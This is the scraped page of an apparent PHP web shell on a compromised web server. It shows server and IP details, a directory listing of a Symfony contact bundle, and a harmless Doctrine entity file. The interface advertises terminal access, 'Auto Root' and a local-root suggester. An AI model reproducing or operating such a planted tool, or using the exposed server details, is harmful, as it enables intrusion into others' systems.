Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
src /
ContactBundle /
Entity /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
ContactMethod.php
1.14
KB
-rwxrwxr-x
2026-05-25 12:28
ContactReason.php
1.14
KB
-rwxrwxr-x
2026-05-25 12:28
MailChimpBatch.php
3.4
KB
-rwxrwxr-x
2026-04-02 11:48
Message.php
15.03
KB
-rwxrwxr-x
2026-05-18 12:51
MessageAttachment.php
1.78
KB
-rwxrwxr-x
2026-05-18 12:51
MessageCredit.php
6.23
KB
-rwxrwxr-x
2026-05-18 12:51
MessageEmbeddedImage.php
1.64
KB
-rwxrwxr-x
2026-05-18 12:51
MessageError.php
2.37
KB
-rwxrwxr-x
2026-05-18 12:51
MessageRecipient.php
8.45
KB
-rwxrwxr-x
2026-05-18 12:51
MessageStat.php
6.03
KB
-rwxrwxr-x
2026-05-18 12:51
MessageType.php
1.18
KB
-rwxrwxr-x
2026-05-25 12:28
Save
Rename
<?php namespace App\ContactBundle\Entity; use Doctrine\ORM\Mapping as ORM; /** * MessageType * * @ORM\Table(name="contact_message_type") * @ORM\Entity(repositoryClass="App\ContactBundle\Repository\MessageTypeRepository") */ class MessageType { /** * @ORM\Id * @ORM\Column(type="string", unique=true) * @ORM\GeneratedValue(strategy="CUSTOM") * @ORM\CustomIdGenerator(class="Ramsey\Uuid\Doctrine\UuidGenerator") */ private $id; /** * @ORM\Column(type="string", length=255) */ private $type_name; /** * Get id * * @return string */ public function getId() { return $this->id; } /** * Set type_name * * @param string $typeName * @return MessageType */ public function setTypeName($typeName) { $this->type_name = $typeName; return $this; } /** * Get type_name * * @return string */ public function getTypeName() { return $this->type_name; } /** * Get object as string * * @return string */ public function __toString() { return (string) $this->getTypeName(); } }